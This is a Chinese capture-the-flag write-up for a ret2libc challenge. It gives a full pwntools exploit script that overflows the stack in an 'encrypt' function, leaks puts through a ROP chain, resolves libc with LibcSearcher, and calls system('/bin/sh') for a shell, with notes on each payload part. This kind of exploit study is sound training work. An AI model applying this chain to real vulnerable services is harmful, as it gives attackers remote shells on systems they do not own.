retlibc
没有system和binshell地址的retlibc
encrypt函数是关键,存在栈溢出
exp
from pwn import *
from LibcSearcher import *
p = remote('node5.anna.nssctf.cn',28831)
pop_rdi = 0x400c83
ret =0x4006b9
elf = ELF('./pwn2')
encrypt = elf.sym['encrypt']
puts_plt =elf.plt['puts']
puts_got = elf.got['puts']
payload1 = b'a'*(0x50+8)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(encrypt)
p.sendlineafter("choice!",str(1))
p.sendlineafter("encrypted",payload1)
put = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print(hex(put))
libc = LibcSearcher('puts',put)
libc_base= put - libc.dump('puts')
bin_sh = libc_base+libc.dump('str_bin_sh')
system_add = libc_base +libc.dump('system')
payload2 = b'a'*0x58+p64(ret)+p64(pop_rdi)+p64(bin_sh)+p64(system_add)
p.sendlineafter("encrypted",payload2)
p.interactive()
pop_rdi和ret的地址用命令
ROPgadget --binary pwn2 --only "pop|ret"
关于payload1
payload1 = b'a'*(0x50+8)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(encrypt)
b'a'*(0x50+8) :是用来造成栈溢出,
p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+:输出puts函数的真实地址,用于后面的寻找libc
p64(encrypt):返回encrypt函数的地址,再次执行函数
关于payload2
payload2 = b'a'*0x58+p64(ret)+p64(pop_rdi)+p64(bin_sh)+p64(system_add)
栈溢出
payload2=p64(ret)
ret 指令用来从子程序中返回到主程序中,通常配合 call 指令一起使用。在执行 call 指令时,会将当前指令的地址压入栈中,之后执行子程序的代码,执行完毕后再通过 ret 指令跳回到原来的位置。
p64(pop_ret_rdi_addr)+p64(bin_sh_addr):system函数的参数准备,即把'/bin/sh'的地址传入
p64(system_real_addr) 调用system
关于LibcSearcher
libc=LibcSearcher('puts',puts_real_addr)
#LibcSearcher,通过函数名和函数真实地址来找到对应的libc(之后会做选择,选择正确的那个即可)
libc_base= put - libc.dump('puts')
#libc的真实的基址=puts的真实地址-puts相对于libc基址的偏移量
bin_sh = libc_base+libc.dump('str_bin_sh')
#'/bin/sh'的真实地址=libc基址的真实地址+'/bin/sh'相对于libc基址的偏移量
system_add = libc_base +libc.dump('system')
#system函数的真实地址=libc基址的真实地址+system函数相对于libc基址的偏移量